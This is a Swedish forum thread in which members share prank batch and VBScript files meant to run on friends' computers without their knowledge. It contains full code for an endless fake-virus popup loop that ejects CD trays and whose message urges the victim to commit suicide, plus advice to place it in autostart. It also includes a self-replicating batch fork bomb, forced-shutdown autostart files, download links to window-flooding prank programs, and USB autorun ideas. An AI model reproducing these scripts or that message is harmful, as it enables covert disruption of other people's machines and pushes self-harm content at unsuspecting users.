Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem

Varför fungerar inte "shutdown -i" i hemmet?

Skickades från m.sweclockers.com

Visa signatur

Chassi: Fractal Design Meshify-C Moderkort: Asus P8Z77V-Pro Hårddisk: 128GB SSD+1TB SSD CPU: i5 3570K 3.4GHz RAM: Corsair 8GB vengeance CPU kylare: Cooler Master Hyper 212+ GPU: ASUS GTX 680 2GB PSU: Corsair TX650W
P280 Crossfire Citera för svar

Permalänk
Medlem
Skrivet av juckeyy:

Varför fungerar inte "shutdown -i" i hemmet?

Skickades från m.sweclockers.com

Om du menar som ett kommando i en schemalagd bat-fil så beror det på att MS patchat bort den möjligheten för några år sedan av säkerhetsskäl.
Finns lite olika workarounds; bl.a TSSHUTDWN eller: http://technet.microsoft.com/en-us/sysinternals/bb897541.aspx (förutsatt att inte dessa också är bort-patchade)

Visa signatur

There are two kinds of people: 1. Those that can extrapolate from incomplete data.
Min tråkiga hemsida om mitt bygge och lite annat smått o gott: www.2x3m4u.net

Permalänk
Medlem

Men alltså den gör ju att man kan stänga av andras datorer från datorn du är vid det fungerar i skolan men hemma är det nåt typ det står såhär när man klickar bläddra "active domain service" liknande är inte tillgänglit

Skickades från m.sweclockers.com

Visa signatur

Chassi: Fractal Design Meshify-C Moderkort: Asus P8Z77V-Pro Hårddisk: 128GB SSD+1TB SSD CPU: i5 3570K 3.4GHz RAM: Corsair 8GB vengeance CPU kylare: Cooler Master Hyper 212+ GPU: ASUS GTX 680 2GB PSU: Corsair TX650W
P280 Crossfire Citera för svar

Permalänk
Medlem

???

Skickades från m.sweclockers.com

Visa signatur

Chassi: Fractal Design Meshify-C Moderkort: Asus P8Z77V-Pro Hårddisk: 128GB SSD+1TB SSD CPU: i5 3570K 3.4GHz RAM: Corsair 8GB vengeance CPU kylare: Cooler Master Hyper 212+ GPU: ASUS GTX 680 2GB PSU: Corsair TX650W
P280 Crossfire Citera för svar

Permalänk
Medlem
Skrivet av juckeyy:

Jucko sluta spamma bara för att ingen kommer med något svar inom några timmar, många på detta forum har arbete/familj/andra sysslor som går före.

För att "svara" på din fråga: Menar du att du vill sitta på din dator i hus X trycka på en knapp och stänga av din "väns" dator i hus Y?

Helt ärligt så är jag ingen hejjare på detta men jag tror det ligger en bit utanför "the power of the .bat file". Om du inte vill/kan skapa en på hans dator.

Permalänk
Medlem
Skrivet av juckeyy:

Men alltså den gör ju att man kan stänga av andras datorer från datorn du är vid det fungerar i skolan men hemma är det nåt typ det står såhär när man klickar bläddra "active domain service" liknande är inte tillgänglit

Skickades från m.sweclockers.com

Enkelt, du behöver sätta upp en AD domän och få honoms dator att gå med i den domänen! Varför det fungerar på skolan är en annan fråga..

Permalänk
Medlem
Skrivet av juckeyy:

Hur bytte du ikon på .bat fil?

Skickades från m.sweclockers.com

Gör en genväg till filen och lägg sjävaste filen någon annanstans

Visa signatur

Bärbar MacBook Pro 15" Mid '14 l
Mobil Iphone 8 l

Permalänk
Medlem
Skrivet av Ludzee:

Gör en genväg till filen och lägg sjävaste filen någon annanstans

Inte för att vara negativ, men jag tror inte att han bryr sig så mycket längre

Permalänk
Skrivet av Kabeltv:

Inte för att vara negativ, men jag tror inte att han bryr sig så mycket längre

Ett halvår hit och dit

Visa signatur

Asus Striker II Extreme / XFX Geforce GTX 280 / Q9450 @ 3.6GHz/ TRUE Noctua 120/ 4x1GB Corsair TWIN3X2048-1333C9DHX / X25-M G2 80gb Velociraptor / Win 7 Ultimate x64/ Antec P190

MovieDatabase

Permalänk
Medlem
Skrivet av Kabeltv:

Inte för att vara negativ, men jag tror inte att han bryr sig så mycket längre

Skrivet av KurreKula:

Ett halvår hit och dit

Bättre sent än aldrig

Visa signatur

Bärbar MacBook Pro 15" Mid '14 l
Mobil Iphone 8 l

Permalänk
Medlem

Tjenare, håller på med en kod i .bat som ska kopiera en fil till C:\\ och sedan köra, men till problemet.
Allt ska kopieras från ett USB minne och hur skriver jag i .bat filen för att det alltid ska gå att köra skriptet, dvs att sitter USB pinnen i G:// ska skriptet xcopy G:\\DVD.vbs C:\\
och sen om det byter bokstav ska det göra det i skriptet med, ungefär som koden %sysytemroot% fast att den går till mappen skriptet körs ifrån.

Tack på förhand

EDIT: Löste det med %root%

Visa signatur

GA-P55-UD3 | Intel Core i5 750 @ 4Ghz 24/7 clock med H50 | Vengeance, 8gb @ 1600Mhz | 6950 CF| M4 64gb SSD | Corsair 650W

Permalänk
Medlem
Skrivet av Erik541:

Tjenare, håller på med en kod i .bat som ska kopiera en fil till C:\\ och sedan köra, men till problemet.
Allt ska kopieras från ett USB minne och hur skriver jag i .bat filen för att det alltid ska gå att köra skriptet, dvs att sitter USB pinnen i G:// ska skriptet xcopy G:\\DVD.vbs C:\\
och sen om det byter bokstav ska det göra det i skriptet med, ungefär som koden %sysytemroot% fast att den går till mappen skriptet körs ifrån.

Tack på förhand

EDIT: Löste det med %root%

Hade varit trevligt om du förklarade hur du gjorde, skulle själv behöva ett sådant skript

Permalänk
Medlem

Skapa ett text dokument.
i testdokumentet skriver du:

While(true)
Response = MsgBox("Du har ett stort virus i din dator, vill du ta bort det nu?", 3, "Virus!")
If Response = 7 Then
Response = MsgBox("Viruset kommer finnas kvar i din dator tills du inte gör något åt saken", 1, "Virus!")
If Response = 7 Then

Else
MsgBox("Det rekommenderas inte att du bara skiter i det")
End If

ElseIf Response = 6 Then
MsgBox("Viruset går inte att ta bort eftersom att det stora viruset är du ")
Response = MsgBox("Du kan börja radera lite bilder på dig själv sedan tar du självmord, då kommer viruset försvinna!", 1, "Virus!")
End If
WScript.Sleep(1555)

Set wmp = CreateObject("WMPlayer.OCX.7") 'cd_lasaren_åker_in_och_ut.
Set cdroms = wmp.cdromCollection

If cdroms.Count >= 1 then

For i = 0 to cdroms.Count - 1
cdroms.Item(i).Eject
Next

For i = 0 to cdroms.Count - 1
cdroms.Item(i).Eject
Next
End If
Wend

ändra filändelse till tex: funny.vbs

lägg filen i autostart på en polares dator och se när han får panik

dir länk för att ladda ner filen: --> https://dl.dropbox.com/s/najc4gmrpo56mg8/Funny_virus_V2.vbs?d...

Permalänk
Medlem

denna koden ska vara helt ok att testa på egen dator? Låter ju kul ^^

Permalänk
Medlem

Det finns ju den standard shutdown -s -f auto start filen
Sen finns en annan ganska rolig
Filnamn: Namn.bat
Text: Start Namn.bat
hehehe

Permalänk
Medlem
Skrivet av SomNa:

Tack RiJo nu blev den ännu bättre!

Jag fixade tre filer som jag lade in på mitt USB minne (En som visar ett meddelande på min väns dator, en som startar upp filen varje gång och en som flyttar filerna till rätt platser i datorn.) Tack så mycket för hjälpen med att jävlas :D. Resultatet blev mycket lyckat, min vän trodde att han hade fått virus och installerade om datorn! TACK!

Nu siktar jag mot nästa jävulskap! Någon som har något bra förslag?

Hur gör man en fil som skapar/flyttar en fil på ett valt ställe???

Jag har länge undrat hur man gör en bat/vbs som man har på ett USB-minne, och när man sätter i det i datorn skapar den en fil i auto start. Hjälp snälla

Permalänk
Medlem
Skrivet av hammark9:

Hur gör man en fil som skapar/flyttar en fil på ett valt ställe???

Jag har länge undrat hur man gör en bat/vbs som man har på ett USB-minne, och när man sätter i det i datorn skapar den en fil i auto start. Hjälp snälla

Går inte. Inga filers körs automatiskt av att du stoppar in ett USB minne. Någon måste starta filen.

För att flytta filer: http://ss64.com/nt/move.html

Visa signatur

Programmerare -> PHP | HTML | CSS | JS | Java.

Permalänk
Medlem
Skrivet av Sony?:

Går inte. Inga filers körs automatiskt av att du stoppar in ett USB minne. Någon måste starta filen.

För att flytta filer: http://ss64.com/nt/move.html

Nu borde man väl inte uppmuntra till sånthäringa tramsande, men det borde väl gå utmärkt att knappra ihop en autorun.inf som kör batfilen när usbminnet pluggas in.

Visa signatur

Nu lurade jag dig att slösa bort ett par värdefulla sekunder av ditt liv på att läsa denna fullständigt poänglösa signatur!

Permalänk
Medlem
Skrivet av kaput:

Nu borde man väl inte uppmuntra till sånthäringa tramsande, men det borde väl gå utmärkt att knappra ihop en autorun.inf som kör batfilen när usbminnet pluggas in.

Nej. Från och med windows vista så krävs det att man trycker på "kör autorun xxx" om man inte har stängt av den säkerhets varningen.

Visa signatur

Programmerare -> PHP | HTML | CSS | JS | Java.

Permalänk
Medlem

Har tråden dött ?

Permalänk

Jag har själv gjort denna och testat den, MYCKET IRRITERANDE

Ni bör se till att offret inte har viktiga osparade dokument öppna eller liknande.

Det programmet gör:
1. öppnar troll låten på youtube med standard webbläsaren
2. öppnar trollface bilden
3. öppnar en cmd panel där det står "installing java, please wait"
4. bombar datorn med cmd fönster som kommer räkna till 100 000
5. Om datorn kommer klara av att räkna tillräckligt fort utan att lagga sönder eller krascha kommer den visa ett medelande där det står "wow, you really got a fast computer!"

enda sättet att få den att sluta är att "döda" datorn eller öppna aktivitetshanteraren och "döda" programmet som bombar datorn väldigt snabbt!

JAG HAR VARNAT DIG!

http://www.mediafire.com/download/5sw8lscsg5ysg8v/Prank!_by_u...

Visa signatur

i7-4770k OC @ 4,501 Ghz
Asus Geforce GTX 1070 Strix Gaming OC @ 1900 Mhz
16 gb Corsair Vengeance Pro OC @ CL9 2133 Mhz
Samsung SSD 840 OC @ Secret Mhz ;)
Blev på något konstigt vis en mac ägare efter 15 år med windows🤔

Permalänk
Medlem

Började på ett vbs skript förut men lyckades aldrig göra klart det:

max = 10 min = 2 correctAnswer = 0 answer = 1 number1 = Int((max-min+1)*Rnd+min) number2 = Int((max-min+1)*Rnd+min) Do Until False correctAnswer = number1*number2 answer = InputBox("Vad e " & number1 & "*" & number2 & "?", "MATTE TRÄNING <3", 0) If IsNumeric(answer) = False then answer = 0 End If If CInt(answer)=CInt(correctAnswer) then WScript.CreateObject("WScript.Shell").Popup "Bravo! Du börjar bli bra på det här!", 0, "Övning ger färdighet", 4096 WScript.Sleep(1000*60*60*1) number1 = Int((max-min+1)*Rnd+min) number2 = Int((max-min+1)*Rnd+min) End If Loop

Spara som troll.vbs.

Det scriptet gör är att det popar upp en ruta med ett random matte tal varje timme

Återstår att skapa:

  1. Tvingad att svara i rutan, ska inte gå att ctrl+alt+delte eller bara strunta i rutan

  2. autostart

^^.

Är nog bäst att gör sånt här i C istället...

Visa signatur

Programmerare -> PHP | HTML | CSS | JS | Java.